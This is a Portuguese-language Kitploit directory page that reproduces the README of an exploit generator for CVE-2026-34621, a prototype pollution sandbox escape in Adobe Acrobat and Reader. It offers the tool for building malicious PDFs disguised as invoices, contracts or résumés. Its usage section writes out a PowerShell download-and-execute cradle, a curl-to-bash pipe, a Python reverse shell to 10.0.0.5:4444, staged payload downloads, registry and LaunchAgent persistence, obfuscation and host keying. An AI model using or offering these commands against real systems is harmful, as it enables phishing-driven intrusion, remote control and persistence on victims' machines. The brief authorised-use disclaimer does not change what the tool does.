Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

FeedsContatoPrivacidade© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
cve_2026_34621_advanced — Um gerador de exploits sofisticado e multiplataforma para **CVE-2026-34621** – uma vulnerabilidade crítica de poluição de protótipo no Adobe Acrobat e Reader que leva à fuga da sandbox e à execução arbitrária de código no Windows e macOS. | Kitploit
Ferramentas/GitHubGitHub/null200ok/cve_2026_34621_advanced
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed TeamingDesenvolvimento de Payloads
GitHubnull200ok/cve_2026_34621_advanced

cve_2026_34621_advanced

Um gerador de exploits sofisticado e multiplataforma para **CVE-2026-34621** – uma vulnerabilidade crítica de poluição de protótipo no Adobe Acrobat e Reader que leva à fuga da sandbox e à execução arbitrária de código no Windows e macOS.

Ver Repositório
13612há 5 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Gerador de Exploit Avançado CVE-2026-34621

Python 3.7+ License

Um gerador de exploits sofisticado e multiplataforma para CVE-2026-34621 – uma vulnerabilidade crítica de poluição de protótipo no Adobe Acrobat e Reader que leva à fuga da sandbox e à execução arbitrária de código no Windows e macOS.

⚠️ AVISO IMPORTANTE
Esta ferramenta destina-se apenas a pesquisas de segurança autorizadas e testes de penetração.
O uso não autorizado contra sistemas que você não possui ou para os quais não tem permissão explícita por escrito para testar é ilegal. O autor não assume nenhuma responsabilidade por uso indevido.


📋 Índice

  • Visão Geral
  • Recursos
  • Instalação
  • Início Rápido
  • Exemplos de Uso
    • Comandos para Windows
    • Comandos para macOS
    • Teste em Dispositivos Móveis
  • Opções de Linha de Comando
  • Como Funciona
  • Versões Afetadas
  • Mitigação
  • Contribuição
  • Licença

🔍 Visão Geral

CVE-2026-34621 é uma vulnerabilidade de dia zero no Adobe Acrobat e Reader que permite a um atacante:

  1. Poluir o protótipo do objeto JavaScript no mecanismo da Adobe.
  2. Contornar a sandbox de segurança.
  3. Executar comandos arbitrários do sistema na máquina da vítima.

Este gerador cria um arquivo PDF malicioso que, quando aberto em uma versão vulnerável do Adobe Reader, executa automaticamente um payload adaptado ao sistema operacional da vítima.

Plataformas de Destino Suportadas:

  • ✅ Windows (execução arbitrária de código completa)
  • ✅ macOS (execução arbitrária de código completa)
  • ❌ Android / iOS (não vulneráveis – apenas fallback de demonstração)

✨ Recursos

CategoriaCapacidades
Payloads MultiplataformaDetecta automaticamente o SO e seleciona o método de execução de comandos apropriado para Windows ou macOS.
Múltiplos Vetores de Execuçãocmd.exe, PowerShell, WScript.Shell (Windows) / Terminal.app, osascript (macOS).
Payloads em EstágiosBaixa e executa payloads de segundo estágio a partir de uma URL remota.
PersistênciaInstala chave Run no registro (Windows) ou LaunchAgent (macOS).
Técnicas de EvasãoTrês níveis de ofuscação de JavaScript, chaveamento por ambiente, atrasos de execução, código polimórfico.
Incorporação em PDF IscaMescla o exploit em um PDF de aparência legítima (requer PyPDF2).
Múltiplos GatilhosOpenAction, ação de abertura de página ou JavaScript em nível de documento.
Relatórios AbrangentesRelatórios em HTML, TXT e JSON detalhando a configuração do payload.

📦 Instalação

1. Clonar o Repositório

git clone https://github.com/NULL200OK/CVE-2026-34621-Exploit.git
cd CVE-2026-34621-Exploit

2. (Opcional) Criar um Ambiente Virtual

python3 -m venv venv
source venv/bin/activate      # Linux/macOS
venv\Scripts\activate         # Windows

3. Instalar Dependências

O script principal usa apenas a biblioteca padrão do Python. Para o recurso de mesclagem de PDF isca, instale o PyPDF2:

pip install PyPDF2

🚀 Início Rápido

Gere um PDF básico que abre a calculadora no Windows e no macOS:

python3 cve_2026_34621_advanced.py -o test.pdf

Isso cria:

test.pdf – O arquivo PDF malicioso.

test_report.html – Relatório HTML detalhado.

test_report.txt – Resumo em texto simples.

test_config.json – Exportação da configuração em JSON.

💻 Exemplos de Uso

Comandos para Windows

1-Cenário Comando

A-Popup básico do calc.exe

python cve_2026_34621_advanced.py -o invoice.pdf --win calc.exe

Reverse shell com PowerShell

python cve_2026_34621_advanced.py -o contract.pdf --win "powershell -NoP -Ep Bypass -C \"IEX(New-Object Net.WebClient).DownloadString('http://10.0.0.5/shell.ps1')\""

Payload em estágios com persistência

python cve_2026_34621_advanced.py -o resume.pdf --win calc.exe --stage http://192.168.1.100/payload.exe -p

Chaveamento por ambiente (executar apenas em "SALES-PC")

python cve_2026_34621_advanced.py -o targeted.pdf --win calc.exe -k SALES-PC

Com nível de ofuscação 2 e atraso de 10 segundos

python cve_2026_34621_advanced.py -o delayed.pdf --win calc.exe -O 2 -d 10

Comandos para macOS

2-Cenário Comando

Abrir a Calculadora

python cve_2026_34621_advanced.py -o invoice.pdf --mac "open /System/Applications/Calculator.app"

Baixar e executar script

python cve_2026_34621_advanced.py -o update.pdf --mac "curl -s http://10.0.0.5/mac_payload.sh | bash"

Reverse shell via Python

python cve_2026_34621_advanced.py -o shell.pdf --mac "python -c 'import socket,subprocess,os;s=socket.socket();s.connect((\"10.0.0.5\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/sh\",\"-i\"])'"

Persistência via LaunchAgent

python cve_2026_34621_advanced.py -o persist.pdf --mac "open /Applications/Calculator.app" -p

Incorporação em um PDF Isca

python cve_2026_34621_advanced.py -o safe_invoice.pdf -l /path/to/real_invoice.pdf --trigger pageopen

3-Nota sobre Testes em Dispositivos Móveis

O script em si é executado em desktop (Windows/macOS/Linux) para gerar o PDF. O PDF gerado pode ser aberto em dispositivos Android ou iOS, mas:

As versões móveis do Adobe Acrobat Reader não são vulneráveis ao CVE-2026-34621.

O payload acionará um fallback de demonstração benigno (abre uma URL ou exibe um alerta) em vez de executar comandos do sistema.

📖 Opções de Linha de Comando

Opção Descrição

-o, --output ARQUIVO Obrigatório. Nome do arquivo PDF de saída.

--win CMD Comando do Windows a executar (padrão: calc.exe).

--mac CMD Comando do macOS a executar (padrão: open /System/Applications/Calculator.app).

--stage URL URL para baixar o payload de segundo estágio.

-p, --persistence Instala mecanismo de persistência (Registry/LaunchAgent).

-O, --obfuscate NÍVEL Nível de ofuscação de JavaScript (0=nenhum, 1=básico, 2=intermediário, 3=avançado).

-d, --delay SEGUNDOS Atrasa a execução pelo número de segundos especificado.

-k, --key NOME_DO_HOST Chaveamento por ambiente – executa apenas em hostname correspondente.

-l, --lure PDF Caminho para um PDF legítimo a ser usado como isca (mescla o exploit).

--trigger TIPO Vetor de gatilho: openaction, pageopen ou doclevel.

--no-reports Pula a geração de relatórios HTML/TXT/JSON.

--seed N Define a semente aleatória para geração polimórfica reproduzível.

⚙️ Como Funciona

Cadeia de Ataque

Poluição de Protótipo:

O JavaScript incorporado modifica Object.prototype para injetar propriedades maliciosas (__trusted, privileged, etc.). Isso confunde o limite de confiança do mecanismo JavaScript da Adobe.

Escalonamento de Contexto

Devido ao protótipo poluído, o mecanismo trata incorretamente o JavaScript não confiável do documento como se estivesse sendo executado em um contexto privilegiado.

Acesso a APIs Privilegiadas

O script agora pode chamar APIs restritas como app.launchURL, util.readFileIntoStream e app.trustedFunction.

Fuga da Sandbox

Essas APIs permitem acesso ao sistema de arquivos e execução de processos fora da sandbox da Adobe.

Execução Arbitrária de Código

O script executa o comando do atacante usando métodos específicos do SO:

Windows: cmd.exe /c, PowerShell ou WScript.Shell.

macOS: manipulador de URL do Terminal.app ou osascript.

Baixar ferramenta